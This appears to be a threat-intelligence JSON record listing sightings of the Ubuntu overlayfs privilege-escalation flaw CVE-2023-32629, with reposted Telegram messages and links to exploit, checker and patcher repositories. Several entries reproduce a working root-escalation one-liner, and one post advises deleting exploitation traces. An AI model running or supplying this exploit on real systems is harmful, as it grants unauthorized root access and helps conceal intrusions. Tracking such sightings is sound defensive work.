{"vulnerability": "CVE-2023-32629", "sightings": [{"uuid": "c633e1ea-b5ae-4190-9e0a-d78614cc02ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "seen", "source": "MISP/851cd517-5e71-4cbc-ac92-bb9c2c9b1499", "content": "", "creation_timestamp": "2024-04-19T09:48:27.000000Z"}, {"uuid": "018f48ec-0f99-4f79-b935-dbcf303f9cd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:54.000000Z"}, {"uuid": "1dd7c8c5-d82d-464d-b868-3e90d9e4eea4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "dbf0cbe6-0209-46ca-861a-df3ecf6fa21f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:01.000000Z"}, {"uuid": "5e4ef459-11a0-4342-9f36-543f15a31c52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2023-32629", "type": "seen", "source": "https://gist.github.com/okfull/f7286f6cee1de1888e21dfc6de914ebc", "content": "", "creation_timestamp": "2025-02-15T04:06:07.000000Z"}, {"uuid": "3c0cd9c0-acc4-4619-90e9-3f36abffb061", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/cKure/11387", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 Check for CVE-2023-32629 GameOver(lay).\n\nhttps://github.com/kaotickj/Check-for-CVE-2023-32629-GameOver-lay", "creation_timestamp": "2023-08-13T07:34:24.000000Z"}, {"uuid": "6e72476b-0dad-4fc8-a7af-aa14e97a96bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/gameoverlay_privesc.rb", "content": "", "creation_timestamp": "2024-12-18T20:51:38.000000Z"}, {"uuid": "f1944a69-e797-4770-a5fd-d7685f2755d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3ly226qwqnw2d", "content": "", "creation_timestamp": "2025-09-04T21:02:24.471436Z"}, {"uuid": "5dfd167c-6682-48db-b302-d7359d65906d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5154", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aGameoverlayFS (CVE-2023-2640 and CVE-2023-32629) exploit  in Shell Script tested on Ubuntu 20.04 Kernel 5.4.0\nURL\uff1ahttps://github.com/luanoliveira350/GameOverlayFS\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-09-17T23:31:29.000000Z"}, {"uuid": "a6a6d3bc-c91a-4608-b317-68af605095b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4982", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aJuju: GameOver(lay) CVE-2023-2640 and CVE-2023-32629 patcher\nURL\uff1ahttps://github.com/johnlettman/juju-scripts\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-08-24T18:38:28.000000Z"}, {"uuid": "814d7fde-7b77-4a37-b972-fe4f2f2d8a68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5767", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aOne-Liner CVE-2023-32629/CVE-2023-2640 Ubuntu Privilege Escalation\nURL\uff1ahttps://github.com/k4but0/Ubuntu-LPE\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-11-11T14:35:10.000000Z"}, {"uuid": "ff32ccdb-b58d-4472-9493-95fcde4e9a99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4869", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aJuju: GameOver(lay) CVE-2023-2640 and CVE-2023-32629 patcher\nURL\uff1ahttps://github.com/johnlettman/juju-patch-gameoverlay\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-08-04T18:39:02.000000Z"}, {"uuid": "57d98ccc-da82-4e50-821d-4547cc91fe72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4904", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCheck for CVE-2023-32629 \\\"GameOver(lay)\\\" vulnerability \nURL\uff1ahttps://github.com/kaotickj/Check-for-CVE-2023-32629-GameOver-lay\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-08-11T21:13:28.000000Z"}, {"uuid": "f11939b7-8159-4505-ab2d-5382dab8113c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5153", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aGameoverlayFS (CVE-2023-2640 and CVE-2023-32629) exploit  in Shell Script tested on Ubuntu 20.04 Kernel 5.4.0\nURL\uff1ahttps://github.com/luanoliveira350/exploits\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-09-17T23:21:56.000000Z"}, {"uuid": "1f27dc1c-8743-41fa-9e1d-0fb6f06f4818", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/poxek/3657", "content": "Ubuntu Privilege escalation\nCVE-2023-32629 &amp; CVE-2023-2640\n#linux #LPE #\u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0435\n\nPoC:\nunshare -rm sh -c \"mkdir l u w m &amp;&amp; cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m &amp;&amp; touch m/*; python3 -c 'import os;os.setuid(0);os.system(\\\"/bin/bash\\\")'\"\n\n\ud83d\udccc \u041d\u0435 \u0437\u0430\u0431\u044b\u0432\u0430\u0439\u0442\u0435 \u0443\u0431\u0440\u0430\u0442\u044c \u0441\u043b\u0435\u0434\u044b \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 (\u043f\u0430\u043f\u043a\u0438 l u w m):\nrm -rf l u w m\n\n\ud83c\udf1a @poxek", "creation_timestamp": "2024-02-05T13:01:28.000000Z"}, {"uuid": "f7e3bc5f-686f-40bc-bed2-77977117d294", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4926", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-2640 CVE-2023-32629\nURL\uff1ahttps://github.com/OllaPapito/gameoverlay\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-08-15T19:13:54.000000Z"}, {"uuid": "4b4722f6-166e-44e7-8518-ab0d8abbbf4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5732", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aUbuntu Privilege Escalation bash one-liner using CVE-2023-32629 &amp; CVE-2023-2640\nURL\uff1ahttps://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-11-09T09:21:06.000000Z"}, {"uuid": "f9d891c2-54f2-4731-bc32-b2d133d1de88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5793", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-32629 &amp; CVE-2023-2640  Ubuntu Privilege Escalation POC\nURL\uff1ahttps://github.com/Umutkgz/CVE-2023-32629-CVE-2023-2640-Ubuntu-Privilege-Escalation-POC\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-11-14T08:43:11.000000Z"}, {"uuid": "37ab80c1-22c3-48ee-a6a0-887dbc21f8e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "Telegram/kld9yLBbS6fzFNytGTSDXwsTRi8Qoep-LDw8M-oA9J472Qs", "content": "", "creation_timestamp": "2026-04-26T03:00:05.000000Z"}, {"uuid": "eac4ed12-e74c-433c-845e-b8ad0f8b7b43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/bh_cat/202", "content": "\ud83d\udcd5 \u041f\u043e\u0434\u0431\u043e\u0440\u043e\u0447\u043a\u0430 \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83d\udca1 Atlassian Confluence Server - Improper Authorization\n\n\u041e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435:\nCVE-2023-22518\n\u0421\u043a\u043e\u0440\u0438\u043d\u0433 CVSS3.x:\n\u270d\ufe0f\u270d\ufe0f\u270d\ufe0f\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435:\n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c, \u0438\u043c\u0435\u044e\u0449\u0438\u043c \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0443 Confluence, \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0431\u0430\u0437\u0443 \u0434\u0430\u043d\u043d\u044b\u0445 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430 Confluence \u0438, \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435, \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b.\nPOC\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\n\n\n\ud83d\udca1 Microsoft Message Queuing Remote Code Execution\n\n\u041e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435:\nCVE-2023-21554\n\u0421\u043a\u043e\u0440\u0438\u043d\u0433 CVSS3.x:\n\u270d\ufe0f\u270d\ufe0f\u270d\ufe0f\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435: \n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0433\u0440\u043e\u0436\u0430\u044e\u0449\u0435\u043c\u0443 \u0430\u0433\u0435\u043d\u0442\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c RCE-\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043f\u0443\u0442\u0435\u043c \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u0430\u043a\u0435\u0442\u0430 Microsoft Messaging Queue.\nPOC\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\n\n\ud83d\udca1 Google Chrome heap buffer overflow in WebP \n\n\u041e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435:\nCVE-2023-4863\n\u0421\u043a\u043e\u0440\u0438\u043d\u0433 CVSS3.x: \n\u270d\ufe0f\u270d\ufe0f\u270d\ufe0f\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435:\n-  \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0437\u0430\u043f\u0438\u0441\u044c \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u043f\u0430\u043c\u044f\u0442\u0438 \u0447\u0435\u0440\u0435\u0437 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u0443\u044e HTML-\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443.\nPOC\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\n\n\ud83d\udca1 Ubuntu Privilege Escalation (Double)\n\n\u041e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435:\nCVE-2023-2640\nCVE-2023-32629\n\u0421\u043a\u043e\u0440\u0438\u043d\u0433 CVSS3.x:\n\u270d\ufe0f\u270d\ufe0f\u270d\ufe0f\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435:\n- \u041d\u0430 \u044f\u0434\u0440\u0430\u0445 Ubuntu, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0445 \u043a\u0430\u043a c914c0e27eb0, \u0442\u0430\u043a \u0438 \"UBUNTU: SAUCE: overlayfs: \u041f\u0440\u043e\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0434\u043b\u044f trusted.overlayfs.* xattrs\", \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u043d\u044b\u0435 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u044b \u0434\u043b\u044f \u0441\u043c\u043e\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u0438\u0445 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 \u0434\u043b\u044f \u0432\u0435\u0440\u0445\u043d\u0438\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0431\u0435\u0437 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0445 \u043f\u0440\u043e\u0432\u0435\u0440\u043e\u043a \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n- \u041b\u043e\u043a\u0430\u043b\u044c\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u044f\u0434\u0440\u0430\u0445 Ubuntu \u0412 \u044f\u0434\u0440\u0430\u0445 Ubuntu \u043e\u0432\u0435\u0440\u043b\u0435\u0439\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b ovl_copy_up_meta_inode_data \u043f\u0440\u043e\u043f\u0443\u0441\u043a\u0430\u044e\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u043f\u0440\u0438 \u0432\u044b\u0437\u043e\u0432\u0435 ovl_do_setxattr.\nPOC\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\nunshare -rm sh -c \"mkdir l u w m &amp;&amp; cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m &amp;&amp; touch m/*; python3 -c 'import os;os.setuid(0);os.system(\\\"/bin/bash\\\")'\"\n\n#poc", "creation_timestamp": "2023-11-10T11:18:42.000000Z"}, {"uuid": "3cbc5583-79f1-41fa-a1ed-080758629c57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/road_to_oscp/266", "content": "#ubuntu #privesc\n\nGameOver(lay) Ubuntu Privilege Escalation\n\nThanks to: @Ikelt  (his channel)\n\nhttps://github.com/g1vi/CVE-2023-2640-CVE-2023-32629", "creation_timestamp": "2023-10-12T23:20:02.000000Z"}, {"uuid": "f2cca34c-fbf1-4c93-b72a-787937c7fd47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "Telegram/CTnpALb3N4gRNOOR6pdTMCwNdnVLITHynoX5MxKBkUzk", "content": "", "creation_timestamp": "2024-05-03T15:51:20.000000Z"}, {"uuid": "e2946839-e0f3-4d2b-b06d-2a1af9255914", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "Telegram/llJ3Zelv9khtFzEIlG9M-p5v3ilWpn3isYFK1mhnJTqX5Q", "content": "", "creation_timestamp": "2024-02-05T16:42:01.000000Z"}, {"uuid": "e1d9bdb2-2c61-4a20-87fc-bca366f2a175", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "seen", "source": "https://t.me/arpsyndicate/118", "content": "#ExploitObserverAlert\n\nCVE-2023-32629\n\nDESCRIPTION: Exploit Observer has 12 entries related to CVE-2023-32629. Local privilege escalation vulnerability in Ubuntu Kernels overlayfs ovl_copy_up_meta_inode_data skip permission checks when calling ovl_do_setxattr on Ubuntu kernels\n\nFIRST-EPSS: 0.000420000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-11-12T10:45:00.000000Z"}, {"uuid": "fb577c5e-968b-4a7a-b266-dc873813df21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "Telegram/C10Ukd6uaNmL2dCJ4JKu4FFYI3kxwifkbaampl1UlSSR", "content": "", "creation_timestamp": "2023-10-22T23:27:27.000000Z"}, {"uuid": "d1fe25c1-ef92-436f-a0a2-25bdb739c9d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "seen", "source": "Telegram/d4IDmhF_GY2RTUu1Rz7A6eV9z3DwFMVectxUjlKtekAM95Jp", "content": "", "creation_timestamp": "2023-07-28T12:18:45.000000Z"}, {"uuid": "f8be1ab6-9e03-4f58-afa9-7efc3a70ef9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "seen", "source": "https://t.me/arpsyndicate/1946", "content": "#ExploitObserverAlert\n\nCVE-2023-32629\n\nDESCRIPTION: Exploit Observer has 20 entries related to CVE-2023-32629. Local privilege escalation vulnerability in Ubuntu Kernels overlayfs ovl_copy_up_meta_inode_data skip permission checks when calling ovl_do_setxattr on Ubuntu kernels\n\nFIRST-EPSS: 0.000420000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-12-18T08:21:08.000000Z"}, {"uuid": "e406cd34-ba5e-4ad8-a68d-c3ed977871eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/LearnHacking1337/3755", "content": "\ud83d\udc4a CVE-2023-32629 &amp; CVE-2023-2640\n\ud83d\udc27 Ubuntu Privilege Escalation\n\nVulnerable kernels:\nKernel: 6.2.0 | Ubuntu 23.04 (Lunar Lobster) / Ubuntu 22.04 LTS (Jammy Jellyfish)\nKernel: 5.19.0 | Ubuntu 22.10 (Kinetic Kudu) / Ubuntu 22.04 LTS (Jammy Jellyfish)\nKernel: 5.4.0 | Ubuntu 22.04 LTS (Local Fossa) / Ubuntu 18.04 LTS (Bionic Beaver)\n\nCode:\nunshare -rm sh -c \"mkdir l u w m &amp;&amp; cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m &amp;&amp; touch m/*;\" &amp;&amp; u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash &amp;&amp; chmod 4755 /var/tmp/bash &amp;&amp; /var/tmp/bash -p &amp;&amp; rm -rf l m u w /var/tmp/bash\")'", "creation_timestamp": "2023-11-13T22:21:02.000000Z"}, {"uuid": "7e426e86-d07d-4828-a7cd-752e609659f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/WARLOCK_DARK_ARMY_OFFICIALS/3547", "content": "https://gist.github.com/win3zz/aa1ac16c4458aaaec6dd79343b8cd46f\n\nCVE-2023-2640 and CVE-2023-32629", "creation_timestamp": "2023-11-12T08:40:42.000000Z"}, {"uuid": "5e594034-08b4-4788-9509-227b39879676", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "seen", "source": "https://t.me/JerusalemElectronicArmy/498", "content": "#\u0623\u062e\u0628\u0627\u0631_\u0627\u0644\u0633\u0627\u064a\u0628\u0631 \n\n\u0627\u0643\u062a\u0634\u0641 \u0627\u0644\u0628\u0627\u062d\u062b\u0648\u0646 \u062b\u063a\u0631\u0627\u062a Linux \u0639\u0627\u0644\u064a\u0629 \u0627\u0644\u062e\u0637\u0648\u0631\u0629 \u0641\u064a \u0646\u0648\u0627\u0629 Ubuntu \u062a\u0624\u062b\u0631 \u0639\u0644\u0649 40% \u0645\u0646 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a\u0646.\nGameOver(lay) CVE-2023-32629 \u0648 CVE-2023-2640\n#\u062c\u064a\u0634_\u0627\u0644\u0642\u062f\u0633_\u0627\u0644\u0625\u0644\u0643\u062a\u0631\u0648\u0646\u064a", "creation_timestamp": "2023-07-29T10:51:52.000000Z"}, {"uuid": "bf19004c-f148-425a-a87c-b54b6639113d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-32629", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3158", "content": "Hackers Factory \n\nCHAOS\n\nchaos is an 'origin' IP scanner developed by RST in collaboration with ChatGPT. It is a niche utility with an intended audience of mostly penetration testers and bug hunters.\n\ngithub.com/r57-labs/chaos\n\nWeb:\nr57labs.com/chaos\n\n#infosec #pentesting #bugbounty\n\nCheck for CVE-2023-32629 \"GameOver(lay)\" vulnerability\n\nhttps://github.com/kaotickj/Check-for-CVE-2023-32629-GameOver-lay\n\nColumbus server\n\nColumbus Project is an API first subdomain discovery service, blazingly fast subdomain enumeration service with advanced features.\n\nhttps://github.com/elmasy-com/columbus-server\n\nSimple-XSS is a multiplatform cross-site scripting (XSS) vulnerability exploitation 